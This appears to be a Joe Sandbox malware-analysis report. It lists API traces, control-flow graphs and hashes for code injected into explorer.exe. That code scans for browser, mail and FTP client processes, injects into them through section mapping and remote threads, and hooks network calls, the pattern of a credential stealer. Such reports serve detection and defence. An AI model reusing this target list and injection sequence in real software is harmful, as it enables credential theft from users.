                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_11_2_1d1000_explorer.jbxd
                                                                        Similarity
                                                                        • API ID: OpenQueryValue$CloseEnumFreeHeapNamesPrivateProfileSection
                                                                        • String ID:
                                                                        • API String ID: 1841478724-0
                                                                        • Opcode ID: 64400a878c992fa71e856e46df4fac4649fc2a7aa652cbc33b09ef089e85c32b
                                                                        • Instruction ID: 0e33bd0f8b213b7608e1a87d3074433987aa4d794f61a9af5e539c9510e7d4fa
                                                                        • Opcode Fuzzy Hash: 64400a878c992fa71e856e46df4fac4649fc2a7aa652cbc33b09ef089e85c32b
                                                                        • Instruction Fuzzy Hash: A7414830718B484FDB98EF6D949972AB6E2FBA8341F00496FA55EC3361DF34D9448B42
                                                                        Function 001D2938 Relevance: 3.0, APIs: 2, Instructions: 34fileCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 232 1d2938-1d2943 233 1d2945-1d2948 232->233 234 1d2984 232->234 233->234 236 1d294a-1d2970 CreateFileW 233->236 235 1d2986-1d298b 234->235 237 1d2980-1d2982 236->237 238 1d2972-1d297a CloseHandle 236->238 237->235 238->237
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 0000000B.00000002.2946927222.00000000001D1000.00000040.80000000.00040000.00000000.sdmp, Offset: 001D1000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_11_2_1d1000_explorer.jbxd
                                                                        Similarity
                                                                        • API ID: CloseCreateFileHandle
                                                                        • String ID:
                                                                        • API String ID: 3498533004-0
                                                                        • Opcode ID: c2797be9488e4e6f5c36404d807aecabd0db32494513c6dc611a488961ed8fb4
                                                                        • Instruction ID: 264686b8a3205558d5275380e21c4bc67fa738683c4cb186f0059383a4edd806
                                                                        • Opcode Fuzzy Hash: c2797be9488e4e6f5c36404d807aecabd0db32494513c6dc611a488961ed8fb4
                                                                        • Instruction Fuzzy Hash: 5CF0E57021571A8FE7486FB844A8336F5D0FB18319F18463EE46AC23D0D77888428702
                                                                        Function 001D22B4 Relevance: 1.5, APIs: 1, Instructions: 25COMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 251 1d22b4-1d22c6 252 1d22c8-1d22d0 CreateStreamOnHGlobal 251->252 253 1d22d6-1d22e6 251->253 252->253
                                                                        APIs
                                                                        • CreateStreamOnHGlobal.COMBASE ref: 001D22D0
                                                                        Memory Dump Source
                                                                        • Source File: 0000000B.00000002.2946927222.00000000001D1000.00000040.80000000.00040000.00000000.sdmp, Offset: 001D1000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_11_2_1d1000_explorer.jbxd
                                                                        Similarity
                                                                        • API ID: CreateGlobalStream
                                                                        • String ID:
                                                                        • API String ID: 2244384528-0
                                                                        • Opcode ID: 1de76282c48f0bd08e98a48b657d2df2c7e3f359bfabb3919f08c1342ed29bc7
                                                                        • Instruction ID: 90f727c0e57445b95457ab55e376c8520b97de21b185cfb7d751038cfe3d5542
                                                                        • Opcode Fuzzy Hash: 1de76282c48f0bd08e98a48b657d2df2c7e3f359bfabb3919f08c1342ed29bc7
                                                                        • Instruction Fuzzy Hash: 50E08C30108B0A8FD758AFBCE4CA07A33A1EBAC252B05053FE005CB114D27988C18741
                                                                        Function 001D298C Relevance: 1.5, APIs: 1, Instructions: 23COMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 254 1d298c-1d2997 255 1d2999-1d299c 254->255 256 1d29b5 254->256 255->256 257 1d299e-1d29a7 GetFileAttributesW 255->257 258 1d29b7-1d29bc 256->258 259 1d29a9-1d29af 257->259 260 1d29b1-1d29b3 257->260 259->260 260->258
                                                                        APIs
                                                                        • GetFileAttributesW.KERNELBASE ref: 001D299E
                                                                        Memory Dump Source
                                                                        • Source File: 0000000B.00000002.2946927222.00000000001D1000.00000040.80000000.00040000.00000000.sdmp, Offset: 001D1000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_11_2_1d1000_explorer.jbxd
                                                                        Similarity
                                                                        • API ID: AttributesFile
                                                                        • String ID:
                                                                        • API String ID: 3188754299-0
                                                                        • Opcode ID: adac2ff7f887c72d82cf14b017212d62fc95523d70b35a7e56ac7f1322cd4b31
                                                                        • Instruction ID: c92bfb55fac26fb4ccd0511eb5877d43910f68b3fb52d136159fb6de357868a1
                                                                        • Opcode Fuzzy Hash: adac2ff7f887c72d82cf14b017212d62fc95523d70b35a7e56ac7f1322cd4b31
                                                                        • Instruction Fuzzy Hash: 1CD05E22612915076B6C26F908E927120A0D73932EB94022BEA36C13A0E3A5C895A201
                                                                        Function 001D1860 Relevance: 1.5, APIs: 1, Instructions: 20memoryCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 261 1d1860-1d1870 call 1d1ad4 264 1d1886-1d188b 261->264 265 1d1872-1d1880 RtlFreeHeap 261->265 265->264
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 0000000B.00000002.2946927222.00000000001D1000.00000040.80000000.00040000.00000000.sdmp, Offset: 001D1000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_11_2_1d1000_explorer.jbxd
                                                                        Similarity
                                                                        • API ID: FreeHeap
                                                                        • String ID:
                                                                        • API String ID: 3298025750-0
                                                                        • Opcode ID: d99d8c33ae82ccdfde5110b6ab349530d41223e3f7429e99417b491f4accb22a
                                                                        • Instruction ID: 40d4adad595331773e2bc96fd1c17638c7bb9a22ed4221692365951983957922
                                                                        • Opcode Fuzzy Hash: d99d8c33ae82ccdfde5110b6ab349530d41223e3f7429e99417b491f4accb22a
                                                                        • Instruction Fuzzy Hash: 23D01224716A042BEF2CBBFE2C8D1747AD2E768212B588066B819C3352EE3DC895C341

                                                                        Execution Graph

                                                                        Execution Coverage:10.3%
                                                                        Dynamic/Decrypted Code Coverage:97.4%
                                                                        Signature Coverage:17.3%
                                                                        Total number of Nodes:306
                                                                        Total number of Limit Nodes:42
                                                                        execution_graph 708 3221000 709 3221010 708->709 710 3221007 708->710 712 3221016 710->712 762 3222608 VirtualQuery 712->762 715 3221097 715->709 717 322102c RtlMoveMemory 718 3221071 GetCurrentProcessId 717->718 719 322104d 717->719 723 3221092 718->723 724 322109e 718->724 799 3222861 GetProcessHeap RtlAllocateHeap 719->799 721 3221052 RtlMoveMemory 721->718 723->715 725 3221095 723->725 765 32210a4 724->765 800 3221332 725->800 727 32210a3 729 3222861 GetProcessHeap RtlAllocateHeap 727->729 730 32210cc 729->730 731 32210dc CreateToolhelp32Snapshot 730->731 732 3221322 Sleep 731->732 733 32210f0 Process32First 731->733 732->731 734 322131b CloseHandle 733->734 735 322110c lstrcmpiA 733->735 734->732 736 3221124 lstrcmpiA 735->736 759 3221280 735->759 737 3221138 lstrcmpiA 736->737 736->759 739 322114c lstrcmpiA 737->739 737->759 738 32225ad OpenProcess IsWow64Process IsWow64Process CloseHandle 738->759 740 3221160 lstrcmpiA 739->740 739->759 742 3221170 lstrcmpiA 740->742 740->759 741 3221305 Process32Next 741->735 743 3221319 741->743 744 3221184 lstrcmpiA 742->744 742->759 743->734 745 3221198 lstrcmpiA 744->745 744->759 746 32211ac lstrcmpiA 745->746 745->759 747 32211c0 lstrcmpiA 746->747 746->759 748 32211d4 lstrcmpiA 747->748 747->759 749 32211e8 lstrcmpiA 748->749 748->759 751 32211fc lstrcmpiA 749->751 749->759 750 3222608 VirtualQuery 750->759 752 322120c lstrcmpiA 751->752 751->759 754 322121c lstrcmpiA 752->754 752->759 753 32212ae lstrcmpiA 753->759 755 322122c lstrcmpiA 754->755 754->759 756 322123c lstrcmpiA 755->756 755->759 758 322124c lstrcmpiA 756->758 756->759 757 3221819 30 API calls 757->759 758->759 760 322125c lstrcmpiA 758->760 759->738 759->741 759->750 759->753 759->757 760->759 761 322126c lstrcmpiA 760->761 761->741 761->759 763 322101e 762->763 763->715 764 3222861 GetProcessHeap RtlAllocateHeap 763->764 764->717 827 3222861 GetProcessHeap RtlAllocateHeap 765->827 767 32210cc 768 32210dc CreateToolhelp32Snapshot 767->768 769 3221322 Sleep 768->769 770 32210f0 Process32First 768->770 769->768 771 322131b CloseHandle 770->771 772 322110c lstrcmpiA 770->772 771->769 773 3221124 lstrcmpiA 772->773 782 3221280 772->782 774 3221138 lstrcmpiA 773->774 773->782 776 322114c lstrcmpiA 774->776 774->782 777 3221160 lstrcmpiA 776->777 776->782 779 3221170 lstrcmpiA 777->779 777->782 778 3221305 Process32Next 778->772 780 3221319 778->780 781 3221184 lstrcmpiA 779->781 779->782 780->771 781->782 783 3221198 lstrcmpiA 781->783 782->778 788 3222608 VirtualQuery 782->788 791 32212ae lstrcmpiA 782->791 828 32225ad OpenProcess 782->828 834 3221819 782->834 783->782 784 32211ac lstrcmpiA 783->784 784->782 785 32211c0 lstrcmpiA 784->785 785->782 786 32211d4 lstrcmpiA 785->786 786->782 787 32211e8 lstrcmpiA 786->787 787->782 789 32211fc lstrcmpiA 787->789 788->782 789->782 790 322120c lstrcmpiA 789->790 790->782 792 322121c lstrcmpiA 790->792 791->782 792->782 793 322122c lstrcmpiA 792->793 793->782 794 322123c lstrcmpiA 793->794 794->782 796 322124c lstrcmpiA 794->796 796->782 797 322125c lstrcmpiA 796->797 797->782 798 322126c lstrcmpiA 797->798 798->778 798->782 799->721 880 3222861 GetProcessHeap RtlAllocateHeap 800->880 802 3221340 GetModuleFileNameA 881 3222861 GetProcessHeap RtlAllocateHeap 802->881 804 3221357 GetCurrentProcessId wsprintfA 882 322263e CryptAcquireContextA 804->882 807 322139c Sleep 887 32224d5 GetCurrentProcessId GetCurrentThreadId CreateToolhelp32Snapshot Thread32First 807->887 808 322140d 905 3222843 808->905 812 32213ae GetModuleHandleA GetProcAddress 813 32213da GetModuleHandleA GetProcAddress 812->813 814 32213c9 812->814 817 3221406 813->817 818 32213f5 813->818 895 3221de3 814->895 815 3222843 3 API calls 819 322141b RtlExitUserThread 815->819 821 32224d5 10 API calls 817->821 820 3221de3 3 API calls 818->820 822 3221425 819->822 820->817 821->808 823 322144b 822->823 824 3222608 VirtualQuery 822->824 823->724 825 322143a 824->825 825->823 910 3221493 825->910 827->767 829 3222600 828->829 830 32225cb IsWow64Process 828->830 829->782 831 32225ee 830->831 832 32225dc IsWow64Process 830->832 833 32225f9 CloseHandle 831->833 832->831 832->833 833->829 835 3222608 VirtualQuery 834->835 836 3221833 835->836 837 3221845 OpenProcess 836->837 838 3221a76 836->838 837->838 839 322185e 837->839 838->782 840 3222608 VirtualQuery 839->840 841 3221865 840->841 841->838 842 3221873 NtSetInformationProcess 841->842 843 322188f 841->843 842->843 865 3221a80 843->865 846 3221a80 2 API calls 847 32218d6 846->847 848 3221a73 CloseHandle 847->848 849 3221a80 2 API calls 847->849 848->838 850 3221900 849->850 871 3221b17 850->871 853 3221a80 2 API calls 854 3221930 RtlMoveMemory RtlMoveMemory NtUnmapViewOfSection 853->854 855 3221985 854->855 856 3221a4e CreateRemoteThread 854->856 857 322198b CreateMutexA GetLastError 855->857 861 32219bb GetModuleHandleA GetProcAddress ReadProcessMemory 855->861 858 3221a65 CloseHandle 856->858 857->855 860 32219a7 CloseHandle Sleep 857->860 859 3221a67 CloseHandle CloseHandle 858->859 859->848 860->857 862 3221a47 861->862 863 32219ec WriteProcessMemory 861->863 862->858 862->859 863->862 864 3221a16 CreateRemoteThread CloseHandle Sleep WriteProcessMemory 863->864 864->862 866 3221a94 865->866 869 32218b4 865->869 867 3221aa4 NtCreateSection 866->867 868 3221ac3 866->868 867->868 868->869 870 3221ad8 NtMapViewOfSection 868->870 869->846 870->869 872 3221b60 871->872 873 3221b2e 871->873 875 3221b71 LoadLibraryA 872->875 878 3221bc3 872->878 879 3221ba1 GetProcAddress 872->879 874 3221b30 RtlMoveMemory 873->874 874->872 874->874 875->872 877 3221910 NtUnmapViewOfSection 875->877 876 3221be1 LdrProcessRelocationBlock 876->877 876->878 877->853 878->876 878->877 879->872 879->877 880->802 881->804 883 3222664 CryptCreateHash lstrlen CryptHashData CryptGetHashParam 882->883 884 3221384 CreateMutexA GetLastError 882->884 885 32226aa wsprintfA 883->885 884->807 884->808 885->885 886 32226cc CryptDestroyHash CryptReleaseContext 885->886 886->884 888 3222515 887->888 889 3222565 CloseHandle 888->889 890 3222555 Thread32Next 888->890 891 3222521 OpenThread 888->891 889->812 890->888 892 3222544 ResumeThread 891->892 893 322253c SuspendThread 891->893 894 322254a CloseHandle 892->894 893->894 894->890 896 3221e56 895->896 897 3221ded 895->897 896->813 897->896 937 3221e93 VirtualProtect 897->937 899 3221e04 899->896 938 3222815 VirtualAlloc 899->938 901 3221e10 902 3221e1a RtlMoveMemory 901->902 903 3221e2d 901->903 902->903 939 3221e93 VirtualProtect 903->939 906 3222608 VirtualQuery 905->906 907 322284b 906->907 908 3221414 907->908 909 322284f GetProcessHeap HeapFree 907->909 908->815 909->908 911 32214c0 910->911 912 32214a1 910->912 914 3221510 911->914 915 32214c8 911->915 940 32217c7 912->940 959 32226e6 lstrlen lstrlen 914->959 917 32217c7 5 API calls 915->917 933 32214b6 915->933 919 32214e0 917->919 919->933 947 3221647 919->947 920 322155f 921 32226e6 2 API calls 920->921 923 322156c 921->923 926 32215a0 923->926 927 3221584 923->927 923->933 924 3221532 961 3221752 GetModuleHandleA GetProcAddress 924->961 932 3222404 5 API calls 926->932 926->933 964 3222404 lstrlen 927->964 930 3221647 11 API calls 930->933 934 32215ac 932->934 933->823 934->933 935 3221647 11 API calls 934->935 936 32214fb 935->936 936->933 970 32215e0 936->970 937->899 938->901 939->896 941 3221812 940->941 942 32217d1 940->942 941->933 942->941 943 32226e6 2 API calls 942->943 944 32217f1 943->944 944->941 975 3222861 GetProcessHeap RtlAllocateHeap 944->975 946 3221804 RtlMoveMemory 946->941 948 3221660 947->948 958 3221745 947->958 949 3221671 lstrlen 948->949 948->958 950 3221683 lstrlen 949->950 949->958 951 3221690 getpeername 950->951 950->958 952 32216ae inet_ntoa htons 951->952 951->958 953 32216cc 952->953 952->958 953->958 976 3222861 GetProcessHeap RtlAllocateHeap 953->976 955 3221717 wsprintfA 956 322173a 955->956 957 3222843 3 API calls 956->957 956->958 957->958 958->936 960 322151d 959->960 960->920 960->924 962 3221539 961->962 963 3221776 RtlZeroMemory RtlZeroMemory RtlZeroMemory RtlZeroMemory 961->963 962->930 962->933 963->962 965 3222456 964->965 966 322241c CryptStringToBinaryA 964->966 965->933 966->965 967 3222438 966->967 977 3222861 GetProcessHeap RtlAllocateHeap 967->977 969 3222444 CryptStringToBinaryA 969->965 971 3222843 3 API calls 970->971 972 32215f5 971->972 973 3222843 3 API calls 972->973 974 32215fc 973->974 974->933 975->946 976->955 977->969 987 3221eb6 988 3221ed9 987->988 989 3221ecc lstrlen 987->989 998 3222861 GetProcessHeap RtlAllocateHeap 988->998 989->988 991 3221ee1 lstrcat 992 3221f16 lstrcat 991->992 993 3221f1d 991->993 992->993 999 3221f4a 993->999 996 3222843 3 API calls 997 3221f40 996->997 998->991 1033 32222b8 999->1033 1003 3221f77 1038 32227e2 lstrlen MultiByteToWideChar 1003->1038 1005 3221f86 1039 3222374 RtlZeroMemory 1005->1039 1008 322229a 1010 3222843 3 API calls 1008->1010 1009 3221fd8 RtlZeroMemory 1011 322200d 1009->1011 1012 3221f2d 1010->1012 1011->1008 1013 322203b 1011->1013 1041 32222e5 1011->1041 1012->996 1016 3222280 1013->1016 1050 3222861 GetProcessHeap RtlAllocateHeap 1013->1050 1015 3222843 3 API calls 1015->1008 1016->1008 1016->1015 1018 322210b wsprintfW 1019 3222131 1018->1019 1023 322219e 1019->1023 1051 3222861 GetProcessHeap RtlAllocateHeap 1019->1051 1021 322216b wsprintfW 1021->1023 1022 322225d 1024 3222843 3 API calls 1022->1024 1023->1022 1052 3222861 GetProcessHeap RtlAllocateHeap 1023->1052 1026 3222271 1024->1026 1026->1016 1027 3222843 3 API calls 1026->1027 1027->1016 1028 3222256 1031 3222843 3 API calls 1028->1031 1029 32221e9 1029->1028 1053 3222815 VirtualAlloc 1029->1053 1031->1022 1032 3222243 RtlMoveMemory 1032->1028 1034 32222c2 1033->1034 1035 3221f69 1033->1035 1036 32226e6 2 API calls 1034->1036 1037 3222861 GetProcessHeap RtlAllocateHeap 1035->1037 1036->1035 1037->1003 1038->1005 1040 3221f96 1039->1040 1040->1008 1040->1009 1042 32222f2 1041->1042 1044 3222353 1041->1044 1043 32222f6 DnsQuery_W 1042->1043 1042->1044 1045 3222335 DnsFree inet_ntoa 1042->1045 1043->1042 1044->1013 1045->1042 1046 3222355 1045->1046 1054 3222861 GetProcessHeap RtlAllocateHeap 1046->1054 1048 322235f 1055 32227e2 lstrlen MultiByteToWideChar 1048->1055 1050->1018 1051->1021 1052->1029 1053->1032 1054->1048 1055->1044 1056 3222806 VirtualFree 1057 3221425 1058 3221432 1057->1058 1059 322144b 1057->1059 1060 3222608 VirtualQuery 1058->1060 1061 322143a 1060->1061 1061->1059 1062 3221493 23 API calls 1061->1062 1062->1059 978 3227728 979 322774b 978->979 985 3227904 978->985 980 322785a LoadLibraryA 979->980 984 322789f VirtualProtect VirtualProtect 979->984 981 3227871 980->981 981->979 983 3227883 GetProcAddress 981->983 983->981 986 3227899 983->986 984->985 985->985 1069 322245e lstrlen 1070 3222476 CryptBinaryToStringA 1069->1070 1071 32224a5 1069->1071 1070->1071 1072 3222489 1070->1072 1075 3222861 GetProcessHeap RtlAllocateHeap 1072->1075 1074 3222494 CryptBinaryToStringA 1074->1071 1075->1074

                                                                        Callgraph

                                                                        • Executed
                                                                        • Not Executed
                                                                        • Opacity -> Relevance
                                                                        • Disassembly available
                                                                        callgraph 0 Function_032227E2 1 Function_03221DE3 21 Function_03221DC0 1->21 34 Function_03221E93 1->34 39 Function_03222815 1->39 43 Function_03221E5D 1->43 2 Function_032215E0 19 Function_03222843 2->19 3 Function_03222861 4 Function_032226E6 5 Function_032210A4 5->3 11 Function_032225AD 5->11 13 Function_03222573 5->13 14 Function_03222731 5->14 30 Function_03222608 5->30 31 Function_03222592 5->31 40 Function_03221819 5->40 6 Function_03221425 6->30 33 Function_03221493 6->33 7 Function_032222E5 7->0 7->3 8 Function_03227728 9 Function_03221469 9->30 9->33 10 Function_032224AE 12 Function_03221332 12->1 12->3 18 Function_0322263E 12->18 12->19 12->30 12->33 38 Function_032224D5 12->38 15 Function_03221EB6 15->3 15->19 29 Function_03221F4A 15->29 16 Function_03222374 17 Function_032222B8 17->4 19->30 20 Function_03221A80 41 Function_03221C19 21->41 22 Function_03221D80 22->41 23 Function_03221000 35 Function_03221016 23->35 24 Function_03222841 25 Function_03222806 26 Function_03221647 26->3 26->10 26->19 27 Function_032217C7 27->3 27->4 28 Function_03222404 28->3 29->0 29->3 29->7 29->14 29->16 29->17 29->19 29->39 32 Function_03221752 33->2 33->4 33->26 33->27 33->28 33->32 35->3 35->5 35->11 35->12 35->13 35->14 35->30 35->31 35->40 36 Function_03221B17 37 Function_03223417 40->20 40->30 40->36 42 Function_0322245E 42->3 43->22

                                                                        Executed Functions

                                                                        Function 03221016 Relevance: 89.5, APIs: 30, Strings: 21, Instructions: 244stringsleepprocessCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 0 3221016-3221020 call 3222608 3 3221022-322104b call 3222861 RtlMoveMemory 0->3 4 3221097-3221098 0->4 7 3221071-3221090 GetCurrentProcessId 3->7 8 322104d-322106b call 3222861 RtlMoveMemory 3->8 12 3221092-3221093 7->12 13 322109e-32210d7 call 32210a4 call 3222861 7->13 8->7 12->4 14 3221095-3221099 call 3221332 12->14 22 32210dc-32210ea CreateToolhelp32Snapshot 13->22 14->13 23 3221322-322132d Sleep 22->23 24 32210f0-3221106 Process32First 22->24 23->22 25 322131b-322131c CloseHandle 24->25 26 322110c-322111e lstrcmpiA 24->26 25->23 27 3221280-3221289 call 32225ad 26->27 28 3221124-3221132 lstrcmpiA 26->28 34 3221305-3221313 Process32Next 27->34 35 322128b-3221294 call 3222592 27->35 28->27 29 3221138-3221146 lstrcmpiA 28->29 29->27 31 322114c-322115a lstrcmpiA 29->31 31->27 33 3221160-322116a lstrcmpiA 31->33 33->27 36 3221170-322117e lstrcmpiA 33->36 34->26 37 3221319 34->37 35->34 41 3221296-322129d call 3222573 35->41 36->27 40 3221184-3221192 lstrcmpiA 36->40 37->25 40->27 42 3221198-32211a6 lstrcmpiA 40->42 41->34 48 322129f-32212ac call 3222608 41->48 42->27 44 32211ac-32211ba lstrcmpiA 42->44 44->27 45 32211c0-32211ce lstrcmpiA 44->45 45->27 47 32211d4-32211e2 lstrcmpiA 45->47 47->27 49 32211e8-32211f6 lstrcmpiA 47->49 48->34 54 32212ae-3221300 lstrcmpiA call 3222731 call 3221819 call 3222731 48->54 49->27 51 32211fc-322120a lstrcmpiA 49->51 51->27 53 322120c-322121a lstrcmpiA 51->53 53->27 55 322121c-322122a lstrcmpiA 53->55 54->34 55->27 57 322122c-322123a lstrcmpiA 55->57 57->27 59 322123c-322124a lstrcmpiA 57->59 59->27 61 322124c-322125a lstrcmpiA 59->61 61->27 63 322125c-322126a lstrcmpiA 61->63 63->27 65 322126c-322127a lstrcmpiA 63->65 65->27 65->34
                                                                        APIs
                                                                          • Part of subcall function 03222608: VirtualQuery.KERNEL32(03224434,?,0000001C), ref: 03222615
                                                                          • Part of subcall function 03222861: GetProcessHeap.KERNEL32(00000008,0000A000,032210CC), ref: 03222864
                                                                          • Part of subcall function 03222861: RtlAllocateHeap.NTDLL(00000000), ref: 0322286B
                                                                        • RtlMoveMemory.NTDLL(00000000,?,00000363), ref: 03221038
                                                                        • RtlMoveMemory.NTDLL(00000000,?,?), ref: 0322106B
                                                                        • NtUnmapViewOfSection.NTDLL(000000FF,?), ref: 03221074
                                                                        • GetCurrentProcessId.KERNEL32(?,03221010), ref: 0322107A
                                                                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 032210DF
                                                                        • Process32First.KERNEL32(00000000,?), ref: 032210FE
                                                                        • lstrcmpiA.KERNEL32(?,firefox.exe), ref: 0322111A
                                                                        • lstrcmpiA.KERNEL32(?,iexplore.exe), ref: 0322112E
                                                                        • lstrcmpiA.KERNEL32(?,chrome.exe), ref: 03221142
                                                                        • lstrcmpiA.KERNEL32(?,opera.exe), ref: 03221156
                                                                        • lstrcmpiA.KERNEL32(?,microsoftedgecp.exe), ref: 03221166
                                                                        • lstrcmpiA.KERNEL32(?,outlook.exe), ref: 0322117A
                                                                        • lstrcmpiA.KERNEL32(?,thebat.exe), ref: 0322118E
                                                                        • lstrcmpiA.KERNEL32(?,thebat32.exe), ref: 032211A2
                                                                        • lstrcmpiA.KERNEL32(?,thebat64.exe), ref: 032211B6
                                                                        • lstrcmpiA.KERNEL32(?,thunderbird.exe), ref: 032211CA
                                                                        • lstrcmpiA.KERNEL32(?,filezilla.exe), ref: 032211DE
                                                                        • lstrcmpiA.KERNEL32(?,smartftp.exe), ref: 032211F2
                                                                        • lstrcmpiA.KERNEL32(?,winscp.exe), ref: 03221206
                                                                        • lstrcmpiA.KERNEL32(?,flashfxp.exe), ref: 03221216
                                                                        • lstrcmpiA.KERNEL32(?,cuteftppro.exe), ref: 03221226
                                                                        • lstrcmpiA.KERNEL32(?,mailmaster.exe), ref: 03221236
                                                                        • lstrcmpiA.KERNEL32(?,263em.exe), ref: 03221246
                                                                        • lstrcmpiA.KERNEL32(?,foxmail.exe), ref: 03221256
                                                                        • lstrcmpiA.KERNEL32(?,alimail.exe), ref: 03221266
                                                                        • lstrcmpiA.KERNEL32(?,mailchat.exe), ref: 03221276
                                                                        • lstrcmpiA.KERNEL32(?,microsoftedgecp.exe), ref: 032212B4
                                                                        • Process32Next.KERNEL32(00000000,00000128), ref: 0322130B
                                                                        • CloseHandle.KERNELBASE(00000000), ref: 0322131C
                                                                        • Sleep.KERNELBASE(000003E8), ref: 03221327
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.4535195693.0000000003221000.00000040.80000000.00040000.00000000.sdmp, Offset: 03221000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_3221000_explorer.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: lstrcmpi$HeapMemoryMoveProcessProcess32$AllocateCloseCreateCurrentFirstHandleNextQuerySectionSleepSnapshotToolhelp32UnmapViewVirtual
                                                                        • String ID: 0-vP,v$263em.exe$alimail.exe$chrome.exe$cuteftppro.exe$filezilla.exe$firefox.exe$flashfxp.exe$foxmail.exe$iexplore.exe$mailchat.exe$mailmaster.exe$microsoftedgecp.exe$opera.exe$outlook.exe$smartftp.exe$thebat.exe$thebat32.exe$thebat64.exe$thunderbird.exe$winscp.exe
                                                                        • API String ID: 2555639992-2153411049
                                                                        • Opcode ID: 3c096b0c7815f787015b6cf02f51cbadf6cdd8357dc65268d356f1cf37601f21
                                                                        • Instruction ID: d489efdd236ecf16d7a15236356c9a04f9a1d23c6e0a7870b7ebabc88a446b57
                                                                        • Opcode Fuzzy Hash: 3c096b0c7815f787015b6cf02f51cbadf6cdd8357dc65268d356f1cf37601f21
                                                                        • Instruction Fuzzy Hash: 5471D835620336BBC710EB71AC48E6E7FACAF55680B4C4A29FE40C7045DB79F6858A74
                                                                        Function 032210A4 Relevance: 80.7, APIs: 26, Strings: 20, Instructions: 203stringsleepprocessCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        APIs
                                                                          • Part of subcall function 03222861: GetProcessHeap.KERNEL32(00000008,0000A000,032210CC), ref: 03222864
                                                                          • Part of subcall function 03222861: RtlAllocateHeap.NTDLL(00000000), ref: 0322286B
                                                                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 032210DF
                                                                        • Process32First.KERNEL32(00000000,?), ref: 032210FE
                                                                        • lstrcmpiA.KERNEL32(?,firefox.exe), ref: 0322111A
                                                                        • lstrcmpiA.KERNEL32(?,iexplore.exe), ref: 0322112E
                                                                        • lstrcmpiA.KERNEL32(?,chrome.exe), ref: 03221142
                                                                        • lstrcmpiA.KERNEL32(?,opera.exe), ref: 03221156
                                                                        • lstrcmpiA.KERNEL32(?,microsoftedgecp.exe), ref: 03221166
                                                                        • lstrcmpiA.KERNEL32(?,outlook.exe), ref: 0322117A
                                                                        • lstrcmpiA.KERNEL32(?,thebat.exe), ref: 0322118E
                                                                        • lstrcmpiA.KERNEL32(?,thebat32.exe), ref: 032211A2
                                                                        • lstrcmpiA.KERNEL32(?,thebat64.exe), ref: 032211B6
                                                                        • lstrcmpiA.KERNEL32(?,thunderbird.exe), ref: 032211CA
                                                                        • lstrcmpiA.KERNEL32(?,filezilla.exe), ref: 032211DE
                                                                        • lstrcmpiA.KERNEL32(?,smartftp.exe), ref: 032211F2
                                                                        • lstrcmpiA.KERNEL32(?,winscp.exe), ref: 03221206
                                                                        • lstrcmpiA.KERNEL32(?,flashfxp.exe), ref: 03221216
                                                                        • lstrcmpiA.KERNEL32(?,cuteftppro.exe), ref: 03221226
                                                                        • lstrcmpiA.KERNEL32(?,mailmaster.exe), ref: 03221236
                                                                        • lstrcmpiA.KERNEL32(?,263em.exe), ref: 03221246
                                                                        • lstrcmpiA.KERNEL32(?,foxmail.exe), ref: 03221256
                                                                        • lstrcmpiA.KERNEL32(?,alimail.exe), ref: 03221266
                                                                        • lstrcmpiA.KERNEL32(?,mailchat.exe), ref: 03221276
                                                                        • lstrcmpiA.KERNEL32(?,microsoftedgecp.exe), ref: 032212B4
                                                                        • Process32Next.KERNEL32(00000000,00000128), ref: 0322130B
                                                                        • CloseHandle.KERNELBASE(00000000), ref: 0322131C
                                                                        • Sleep.KERNELBASE(000003E8), ref: 03221327
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.4535195693.0000000003221000.00000040.80000000.00040000.00000000.sdmp, Offset: 03221000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_3221000_explorer.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: lstrcmpi$HeapProcess32$AllocateCloseCreateFirstHandleNextProcessSleepSnapshotToolhelp32
                                                                        • String ID: 263em.exe$alimail.exe$chrome.exe$cuteftppro.exe$filezilla.exe$firefox.exe$flashfxp.exe$foxmail.exe$iexplore.exe$mailchat.exe$mailmaster.exe$microsoftedgecp.exe$opera.exe$outlook.exe$smartftp.exe$thebat.exe$thebat32.exe$thebat64.exe$thunderbird.exe$winscp.exe
                                                                        • API String ID: 3950187957-1680033604
                                                                        • Opcode ID: 06d1186c71119420c91f395902275101fc9e965ab004db3f9f072ed6a8b44f51
                                                                        • Instruction ID: 4f3110c111c48039931ded274ab514571a200c4b7fea20b428213849e020a33d
                                                                        • Opcode Fuzzy Hash: 06d1186c71119420c91f395902275101fc9e965ab004db3f9f072ed6a8b44f51
                                                                        • Instruction Fuzzy Hash: A251A735A24336BACB10EA719C44E6FBEEC6F45680B4C0A29FA40C3045DB79F5958AB5
                                                                        Function 03227728 Relevance: 6.2, APIs: 4, Instructions: 204COMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
